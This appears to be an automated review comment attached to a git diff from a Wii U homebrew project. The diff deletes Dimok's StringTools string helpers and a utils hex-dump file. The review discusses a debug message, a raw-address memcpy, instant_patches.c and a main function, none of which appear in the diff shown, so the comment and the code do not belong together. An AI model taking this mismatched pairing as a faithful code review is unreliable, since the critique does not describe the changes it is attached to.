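Review bot: The new `DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll);` keeps a trailing `\n` while every other message in this file (`"Load Wii U Menu"`, `"ProcUIInit done"`, `"Exiting."`) has none, so this one line most likely prints with an extra blank line; drop the `\n`. The `memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8)` / `DCStoreRange` pair writes to a raw address with no name or explanation; instant_patches.c in this same commit reads `0x0017FFF0`/`0x0017FFF4` as the default title id, which looks like the other end of this hand-off (inferred from the matching low bits — please confirm), so a named constant with a one-line comment saying that is what the address carries would tie the two sides together. The enclosing `main` starts and ends outside this hunk.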
@@ -1,290 +0,0 @@ -/*************************************************************************** - * Copyright (C) 2010 - * by Dimok - * - * This software is provided 'as-is', without any express or implied - * warranty. In no event will the authors be held liable for any - * damages arising from the use of this software. - * - * Permission is granted to anyone to use this software for any - * purpose, including commercial applications, and to alter it and - * redistribute it freely, subject to the following restrictions: - * - * 1. The origin of this software must not be misrepresented; you - * must not claim that you wrote the original software. If you use - * this software in a product, an acknowledgment in the product - * documentation would be appreciated but is not required. - * - * 2. Altered source versions must be plainly marked as such, and - * must not be misrepresented as being the original software. - * - * 3. This notice may not be removed or altered from any source - * distribution. - * - * for WiiXplorer 2010 - ***************************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -BOOL StringTools::EndsWith(const std::string &a, const std::string &b) { - if (b.size() > a.size()) - return false; - return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin()); -} - -const char *StringTools::byte_to_binary(int32_t x) { - static char b[9]; - b[0] = '\0'; - - int32_t z; - for (z = 128; z > 0; z >>= 1) { - strcat(b, ((x & z) == z) ? "1" : "0"); - } - - return b; -} - -std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) { - std::string output = input; - size_t position; - while (1) { - position = output.find(toBeRemoved); - if (position == std::string::npos) - break; - output.erase(position, 1); - } - return output; -} - -const char *StringTools::fmt(const char *format, ...) 
{ - static char strChar[512]; - strChar[0] = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(strChar, format, va) >= 0)) { - va_end(va); - return (const char *) strChar; - } - va_end(va); - - return NULL; -} - -const wchar_t *StringTools::wfmt(const char *format, ...) { - static char tmp[512]; - static wchar_t strWChar[512]; - strWChar[0] = 0; - tmp[0] = 0; - - if (!format) - return (const wchar_t *) strWChar; - - if (strcmp(format, "") == 0) - return (const wchar_t *) strWChar; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - int bt; - int32_t strlength = strlen(tmp); - bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512); - - if (bt > 0) { - strWChar[bt] = 0; - return (const wchar_t *) strWChar; - } - } - va_end(va); - - return NULL; -} - -int32_t StringTools::strprintf(std::string &str, const char *format, ...) { - static char tmp[512]; - tmp[0] = 0; - int32_t result = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - str = tmp; - result = str.size(); - } - va_end(va); - - return result; -} - -std::string StringTools::strfmt(const char *format, ...) 
{ - std::string str; - static char tmp[512]; - tmp[0] = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - str = tmp; - } - va_end(va); - - return str; -} - -BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) { - if (!strChar || !dest) - return false; - - int bt; - bt = mbstowcs(dest, strChar, strlen(strChar)); - if (bt > 0) { - dest[bt] = 0; - return true; - } - - return false; -} - -int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) { - if (!string || !compare) - return -1; - - char TokCopy[512]; - strncpy(TokCopy, compare, sizeof(TokCopy)); - TokCopy[511] = '\0'; - - char *strTok = strtok(TokCopy, separator); - - while (strTok != NULL) { - if (strcasecmp(string, strTok) == 0) { - return 0; - } - strTok = strtok(NULL, separator); - } - - return -1; -} - -int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) { - if (!string || !extension) - return -1; - - char *ptr = strrchr(string, seperator); - if (!ptr) - return -1; - - return strcasecmp(ptr + 1, extension); -} - - -std::vector StringTools::stringSplit(const std::string &inValue, const std::string &splitter) { - std::string value = inValue; - std::vector result; - while (true) { - uint32_t index = value.find(splitter); - if (index == std::string::npos) { - result.push_back(value); - break; - } - std::string first = value.substr(0, index); - result.push_back(first); - if (index + splitter.size() == value.length()) { - result.push_back(""); - break; - } - if (index + splitter.size() > value.length()) { - break; - } - value = value.substr(index + splitter.size(), value.length()); - } - return result; -} - - -const char *StringTools::FullpathToFilename(const char *path) { - if (!path) - return path; - - const char *ptr = path; - const char *Filename = ptr; - - while (*ptr != '\0') { - if (ptr[0] == '/' && ptr[1] != '\0') - Filename = ptr + 1; - - ++ptr; - } - - return Filename; -} - 
-void StringTools::RemoveDoubleSlashs(std::string &str) { - uint32_t length = str.size(); - - //! clear path of double slashes - for (uint32_t i = 1; i < length; ++i) { - if (str[i - 1] == '/' && str[i] == '/') { - str.erase(i, 1); - i--; - length--; - } - } -} - - -// You must free the result if result is non-NULL. -char *StringTools::str_replace(char *orig, char *rep, char *with) { - char *result; // the return string - char *ins; // the next insert point - char *tmp; // varies - int len_rep; // length of rep (the string to remove) - int len_with; // length of with (the string to replace rep with) - int len_front; // distance between rep and end of last rep - int count; // number of replacements - - // sanity checks and initialization - if (!orig || !rep) - return NULL; - len_rep = strlen(rep); - if (len_rep == 0) - return NULL; // empty rep causes infinite loop during count - if (!with) - with = ""; - len_with = strlen(with); - - // count the number of replacements needed - ins = orig; - for (count = 0; tmp = strstr(ins, rep); ++count) { - ins = tmp + len_rep; - } - - tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1); - - if (!result) - return NULL; - - // first time through the loop, all the variable are set correctly - // from here on, - // tmp points to the end of the result string - // ins points to the next occurrence of rep in orig - // orig points to the remainder of orig after "end of rep" - while (count--) { - ins = strstr(orig, rep); - len_front = ins - orig; - tmp = strncpy(tmp, orig, len_front) + len_front; - tmp = strcpy(tmp, with) + len_with; - orig += len_front + len_rep; // move to next "end of rep" - } - strcpy(tmp, orig); - return result; -} diff --git a/source/utils/StringTools.h b/source/utils/StringTools.h deleted file mode 100644 index 851aa73..0000000 --- a/source/utils/StringTools.h +++ /dev/null 
@@ -1,65 +0,0 @@ -/*************************************************************************** - * Copyright (C) 2010 - * by Dimok - * - * This software is provided 'as-is', without any express or implied - * warranty. In no event will the authors be held liable for any - * damages arising from the use of this software. - * - * Permission is granted to anyone to use this software for any - * purpose, including commercial applications, and to alter it and - * redistribute it freely, subject to the following restrictions: - * - * 1. The origin of this software must not be misrepresented; you - * must not claim that you wrote the original software. If you use - * this software in a product, an acknowledgment in the product - * documentation would be appreciated but is not required. - * - * 2. Altered source versions must be plainly marked as such, and - * must not be misrepresented as being the original software. - * - * 3. This notice may not be removed or altered from any source - * distribution. 
- * - * for WiiXplorer 2010 - ***************************************************************************/ -#ifndef __STRING_TOOLS_H -#define __STRING_TOOLS_H - -#include -#include -#include - -class StringTools { -public: - static BOOL EndsWith(const std::string &a, const std::string &b); - - static const char *byte_to_binary(int32_t x); - - static std::string removeCharFromString(std::string &input, char toBeRemoved); - - static const char *fmt(const char *format, ...); - - static const wchar_t *wfmt(const char *format, ...); - - static int32_t strprintf(std::string &str, const char *format, ...); - - static std::string strfmt(const char *format, ...); - - static BOOL char2wchar_t(const char *src, wchar_t *dest); - - static int32_t strtokcmp(const char *string, const char *compare, const char *separator); - - static int32_t strextcmp(const char *string, const char *extension, char seperator); - - static char *str_replace(char *orig, char *rep, char *with); - - static const char *FullpathToFilename(const char *path); - - static void RemoveDoubleSlashs(std::string &str); - - static std::vector stringSplit(const std::string &value, const std::string &splitter); -}; - -#endif /* __STRING_TOOLS_H */ - diff --git a/source/utils/utils.c b/source/utils/utils.c deleted file mode 100644 index 0bd7516..0000000 --- a/source/utils/utils.c +++ /dev/null 
@@ -1,41 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include "utils/logger.h" - -// https://gist.github.com/ccbrown/9722406 -void dumpHex(const void *data, size_t size) { - char ascii[17]; - size_t i, j; - ascii[16] = '\0'; - WHBLogPrintf("0x%08X (0x0000): ", data); - for (i = 0; i < size; ++i) { - WHBLogWritef("%02X ", ((unsigned char *) data)[i]); - if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') { - ascii[i % 16] = ((unsigned char *) data)[i]; - } else { - ascii[i % 16] = '.'; - } - if ((i + 1) % 8 == 0 || i + 1 == size) { - WHBLogWritef(" "); - if ((i + 1) % 16 == 0) { - WHBLogWritef("| %s \n", ascii); - if (i + 1 < size) { - DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1); - } - } else if (i + 1 == size) { - ascii[(i + 1) % 16] = '\0'; - if ((i + 1) % 16 <= 8) { - WHBLogWritef(" "); - } - for (j = (i + 1) % 16; j < 16; ++j) { - WHBLogWritef(" "); - } - WHBLogWritef("| %s \n", ascii); - } - } - } -} diff --git a/source/utils/utils.h b/source/utils/utils.h deleted file mode 100644 index a502522..0000000 --- a/source/utils/utils.h +++ /dev/null 
@@ -1,40 +0,0 @@ -#ifndef __UTILS_H_ -#define __UTILS_H_ - -#include - -#ifdef __cplusplus -extern "C" { -#endif - -#define LIMIT(x, min, max) \ - ({ \ - typeof( x ) _x = x; \ - typeof( min ) _min = min; \ - typeof( max ) _max = max; \ - ( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \ -}) - -#define DegToRad(a) ( (a) * 0.01745329252f ) -#define RadToDeg(a) ( (a) * 57.29577951f ) - -#define ALIGN4(x) (((x) + 3) & ~3) -#define ALIGN32(x) (((x) + 31) & ~31) - -// those work only in powers of 2 -#define ROUNDDOWN(val, align) ((val) & ~(align-1)) -#define ROUNDUP(val, align) ROUNDDOWN(((val) + (align-1)), align) - - -#define le16(i) ((((uint16_t) ((i) & 0xFF)) << 8) | ((uint16_t) (((i) & 0xFF00) >> 8))) -#define le32(i) ((((uint32_t)le16((i) & 0xFFFF)) << 16) | ((uint32_t)le16(((i) & 0xFFFF0000) >> 16))) -#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32))) - -//Needs to have log_init() called beforehand. -void dumpHex(const void *data, size_t size); - -#ifdef __cplusplus -} -#endif - -#endif // __UTILS_H_